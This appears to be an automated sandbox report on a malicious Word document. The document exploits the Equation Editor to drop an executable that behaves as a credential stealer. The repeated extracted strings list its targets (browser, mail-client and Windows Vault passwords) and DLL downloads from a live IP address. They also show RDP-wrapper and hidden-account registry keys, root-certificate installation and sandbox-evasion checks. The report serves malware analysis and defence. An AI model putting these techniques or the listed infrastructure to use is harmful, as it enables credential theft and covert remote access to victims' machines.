Source: gnwnekc.exe, 00000008.00000003.913528927.00000000008D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: gnwnekc.exe, 00000008.00000003.913528927.00000000008D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SELECT * FROM logins.tmp\Google\Chrome\User Data\Default\Login DataSoftware\Microsoft\Windows\CurrentVersion\App Paths\Pathhttp://www.google.comhttp://5.206.225.104/dll/softokn3.dllhttp://5.206.225.104/dll/msvcp140.dllhttp://5.206.225.104/dll/mozglue.dllhttp://5.206.225.104/dll/vcruntime140.dllhttp://5.206.225.104/dll/freebl3.dllhttp://5.206.225.104/dll/nss3.dllsoftokn3.dllmsvcp140.dllmozglue.dllvcruntime140.dllfreebl3.dllnss3.dllmsvcr120.dllmsvcp120.dllmsvcpmsvcr.dllNSS_InitPK11_GetInternalKeySlotPK11_AuthenticatePK11SDR_DecryptNSSBase64_DecodeBufferPK11_CheckUserPasswordNSS_ShutdownPK11_FreeSlotPR_GetErrorvaultcli.dllVaultOpenVaultVaultCloseVaultVaultEnumerateItemsVaultGetItemVaultFreeInternet ExplorerProfilefirefox.exe\firefox.exe\Mozilla\Firefox\profiles.ini\logins.jsonencryptedUsernamehostnameencryptedPasswordthunderbird.exe\Thunderbird\Could not decryptAccount NameEmailPOP3 ServerPOP3 UserSMTP ServerPOP3 PasswordSMTP PasswordHTTP PasswordIMAP PasswordSoftware\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676sqlite3_opensqlite3_closesqlite3_prepare_v2sqlite3_column_textsqlite3_stepsqlite3_execsqlite3_open_v2sqlite3_column_blobsqlite3_column_typesqlite3_column_bytessqlite3_close_v2sqlite3_finalizeStorage",*Accounts\Account.rec0software\Aerofox\FoxmailPreviewExecutableTermService%ProgramFiles%%ProgramW6432%\Microsoft DN1\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: gnwnekc.exe, 00000008.00000000.911229292.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: gnwnekc.exe, 00000008.00000000.911229292.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: SELECT * FROM logins.tmp\Google\Chrome\User Data\Default\Login DataSoftware\Microsoft\Windows\CurrentVersion\App Paths\Pathhttp://www.google.comhttp://5.206.225.104/dll/softokn3.dllhttp://5.206.225.104/dll/msvcp140.dllhttp://5.206.225.104/dll/mozglue.dllhttp://5.206.225.104/dll/vcruntime140.dllhttp://5.206.225.104/dll/freebl3.dllhttp://5.206.225.104/dll/nss3.dllsoftokn3.dllmsvcp140.dllmozglue.dllvcruntime140.dllfreebl3.dllnss3.dllmsvcr120.dllmsvcp120.dllmsvcpmsvcr.dllNSS_InitPK11_GetInternalKeySlotPK11_AuthenticatePK11SDR_DecryptNSSBase64_DecodeBufferPK11_CheckUserPasswordNSS_ShutdownPK11_FreeSlotPR_GetErrorvaultcli.dllVaultOpenVaultVaultCloseVaultVaultEnumerateItemsVaultGetItemVaultFreeInternet ExplorerProfilefirefox.exe\firefox.exe\Mozilla\Firefox\profiles.ini\logins.jsonencryptedUsernamehostnameencryptedPasswordthunderbird.exe\Thunderbird\Could not decryptAccount NameEmailPOP3 ServerPOP3 UserSMTP ServerPOP3 PasswordSMTP PasswordHTTP PasswordIMAP PasswordSoftware\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676sqlite3_opensqlite3_closesqlite3_prepare_v2sqlite3_column_textsqlite3_stepsqlite3_execsqlite3_open_v2sqlite3_column_blobsqlite3_column_typesqlite3_column_bytessqlite3_close_v2sqlite3_finalizeStorage",*Accounts\Account.rec0software\Aerofox\FoxmailPreviewExecutableTermService%ProgramFiles%%ProgramW6432%\Microsoft DN1\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: gnwnekc.exe, 00000008.00000003.913211098.00000000008C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: gnwnekc.exe, 00000008.00000003.913211098.00000000008C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SELECT * FROM logins.tmp\Google\Chrome\User Data\Default\Login DataSoftware\Microsoft\Windows\CurrentVersion\App Paths\Pathhttp://www.google.comhttp://5.206.225.104/dll/softokn3.dllhttp://5.206.225.104/dll/msvcp140.dllhttp://5.206.225.104/dll/mozglue.dllhttp://5.206.225.104/dll/vcruntime140.dllhttp://5.206.225.104/dll/freebl3.dllhttp://5.206.225.104/dll/nss3.dllsoftokn3.dllmsvcp140.dllmozglue.dllvcruntime140.dllfreebl3.dllnss3.dllmsvcr120.dllmsvcp120.dllmsvcpmsvcr.dllNSS_InitPK11_GetInternalKeySlotPK11_AuthenticatePK11SDR_DecryptNSSBase64_DecodeBufferPK11_CheckUserPasswordNSS_ShutdownPK11_FreeSlotPR_GetErrorvaultcli.dllVaultOpenVaultVaultCloseVaultVaultEnumerateItemsVaultGetItemVaultFreeInternet ExplorerProfilefirefox.exe\firefox.exe\Mozilla\Firefox\profiles.ini\logins.jsonencryptedUsernamehostnameencryptedPasswordthunderbird.exe\Thunderbird\Could not decryptAccount NameEmailPOP3 ServerPOP3 UserSMTP ServerPOP3 PasswordSMTP PasswordHTTP PasswordIMAP PasswordSoftware\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676sqlite3_opensqlite3_closesqlite3_prepare_v2sqlite3_column_textsqlite3_stepsqlite3_execsqlite3_open_v2sqlite3_column_blobsqlite3_column_typesqlite3_column_bytessqlite3_close_v2sqlite3_finalizeStorage",*Accounts\Account.rec0software\Aerofox\FoxmailPreviewExecutableTermService%ProgramFiles%%ProgramW6432%\Microsoft DN1\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: gnwnekc.exe, 00000008.00000003.913357063.00000000008CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: gnwnekc.exe, 00000008.00000003.913357063.00000000008CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SELECT * FROM logins.tmp\Google\Chrome\User Data\Default\Login DataSoftware\Microsoft\Windows\CurrentVersion\App Paths\Pathhttp://www.google.comhttp://5.206.225.104/dll/softokn3.dllhttp://5.206.225.104/dll/msvcp140.dllhttp://5.206.225.104/dll/mozglue.dllhttp://5.206.225.104/dll/vcruntime140.dllhttp://5.206.225.104/dll/freebl3.dllhttp://5.206.225.104/dll/nss3.dllsoftokn3.dllmsvcp140.dllmozglue.dllvcruntime140.dllfreebl3.dllnss3.dllmsvcr120.dllmsvcp120.dllmsvcpmsvcr.dllNSS_InitPK11_GetInternalKeySlotPK11_AuthenticatePK11SDR_DecryptNSSBase64_DecodeBufferPK11_CheckUserPasswordNSS_ShutdownPK11_FreeSlotPR_GetErrorvaultcli.dllVaultOpenVaultVaultCloseVaultVaultEnumerateItemsVaultGetItemVaultFreeInternet ExplorerProfilefirefox.exe\firefox.exe\Mozilla\Firefox\profiles.ini\logins.jsonencryptedUsernamehostnameencryptedPasswordthunderbird.exe\Thunderbird\Could not decryptAccount NameEmailPOP3 ServerPOP3 UserSMTP ServerPOP3 PasswordSMTP PasswordHTTP PasswordIMAP PasswordSoftware\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676sqlite3_opensqlite3_closesqlite3_prepare_v2sqlite3_column_textsqlite3_stepsqlite3_execsqlite3_open_v2sqlite3_column_blobsqlite3_column_typesqlite3_column_bytessqlite3_close_v2sqlite3_finalizeStorage",*Accounts\Account.rec0software\Aerofox\FoxmailPreviewExecutableTermService%ProgramFiles%%ProgramW6432%\Microsoft DN1\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: gnwnekc.exe, 00000008.00000003.913236124.00000000008D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: gnwnekc.exe, 00000008.00000003.913236124.00000000008D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SELECT * FROM logins.tmp\Google\Chrome\User Data\Default\Login DataSoftware\Microsoft\Windows\CurrentVersion\App Paths\Pathhttp://www.google.comhttp://5.206.225.104/dll/softokn3.dllhttp://5.206.225.104/dll/msvcp140.dllhttp://5.206.225.104/dll/mozglue.dllhttp://5.206.225.104/dll/vcruntime140.dllhttp://5.206.225.104/dll/freebl3.dllhttp://5.206.225.104/dll/nss3.dllsoftokn3.dllmsvcp140.dllmozglue.dllvcruntime140.dllfreebl3.dllnss3.dllmsvcr120.dllmsvcp120.dllmsvcpmsvcr.dllNSS_InitPK11_GetInternalKeySlotPK11_AuthenticatePK11SDR_DecryptNSSBase64_DecodeBufferPK11_CheckUserPasswordNSS_ShutdownPK11_FreeSlotPR_GetErrorvaultcli.dllVaultOpenVaultVaultCloseVaultVaultEnumerateItemsVaultGetItemVaultFreeInternet ExplorerProfilefirefox.exe\firefox.exe\Mozilla\Firefox\profiles.ini\logins.jsonencryptedUsernamehostnameencryptedPasswordthunderbird.exe\Thunderbird\Could not decryptAccount NameEmailPOP3 ServerPOP3 UserSMTP ServerPOP3 PasswordSMTP PasswordHTTP PasswordIMAP PasswordSoftware\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676sqlite3_opensqlite3_closesqlite3_prepare_v2sqlite3_column_textsqlite3_stepsqlite3_execsqlite3_open_v2sqlite3_column_blobsqlite3_column_typesqlite3_column_bytessqlite3_close_v2sqlite3_finalizeStorage",*Accounts\Account.rec0software\Aerofox\FoxmailPreviewExecutableTermService%ProgramFiles%%ProgramW6432%\Microsoft DN1\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: gnwnekc.exe, 00000008.00000003.913377903.00000000008D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: gnwnekc.exe, 00000008.00000003.913377903.00000000008D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SELECT * FROM logins.tmp\Google\Chrome\User Data\Default\Login DataSoftware\Microsoft\Windows\CurrentVersion\App Paths\Pathhttp://www.google.comhttp://5.206.225.104/dll/softokn3.dllhttp://5.206.225.104/dll/msvcp140.dllhttp://5.206.225.104/dll/mozglue.dllhttp://5.206.225.104/dll/vcruntime140.dllhttp://5.206.225.104/dll/freebl3.dllhttp://5.206.225.104/dll/nss3.dllsoftokn3.dllmsvcp140.dllmozglue.dllvcruntime140.dllfreebl3.dllnss3.dllmsvcr120.dllmsvcp120.dllmsvcpmsvcr.dllNSS_InitPK11_GetInternalKeySlotPK11_AuthenticatePK11SDR_DecryptNSSBase64_DecodeBufferPK11_CheckUserPasswordNSS_ShutdownPK11_FreeSlotPR_GetErrorvaultcli.dllVaultOpenVaultVaultCloseVaultVaultEnumerateItemsVaultGetItemVaultFreeInternet ExplorerProfilefirefox.exe\firefox.exe\Mozilla\Firefox\profiles.ini\logins.jsonencryptedUsernamehostnameencryptedPasswordthunderbird.exe\Thunderbird\Could not decryptAccount NameEmailPOP3 ServerPOP3 UserSMTP ServerPOP3 PasswordSMTP PasswordHTTP PasswordIMAP PasswordSoftware\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676sqlite3_opensqlite3_closesqlite3_prepare_v2sqlite3_column_textsqlite3_stepsqlite3_execsqlite3_open_v2sqlite3_column_blobsqlite3_column_typesqlite3_column_bytessqlite3_close_v2sqlite3_finalizeStorage",*Accounts\Account.rec0software\Aerofox\FoxmailPreviewExecutableTermService%ProgramFiles%%ProgramW6432%\Microsoft DN1\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain checking for user administrative privileges

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Check user administrative privileges: IsUserAndAdmin, DecisionNode

graph_8-8832

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_6-7959

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 6_2_00401000		6_2_00401000
Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Code function: 9_2_00401000		9_2_00401000

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_8-10370

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2948	Thread sleep time: -300000s >= -30000s			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1136	Thread sleep time: -120000s >= -30000s			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,

8_2_0040BBA0

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_8-8386

Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Code function: 9_2_00401000		9_2_00401000
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 6_2_00401000		6_2_00401000

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Code function: 8_2_0040DB53 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,

8_2_0040DB53

Source: C:\Users\user\AppData\Roaming\word.exe	API call chain: ExitProcess graph end node	graph_5-3480
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	API call chain: ExitProcess graph end node	graph_6-8182
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	API call chain: ExitProcess graph end node	graph_8-8315
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	API call chain: ExitProcess graph end node	graph_8-9295
Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	API call chain: ExitProcess graph end node

Source: word.exe, 00000005.00000002.921412152.0000000000524000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Code function: 6_2_003C0EBF GetSystemInfo,

6_2_003C0EBF

Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	5_2_00405D74
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0040699E FindFirstFileW,FindClose,	5_2_0040699E
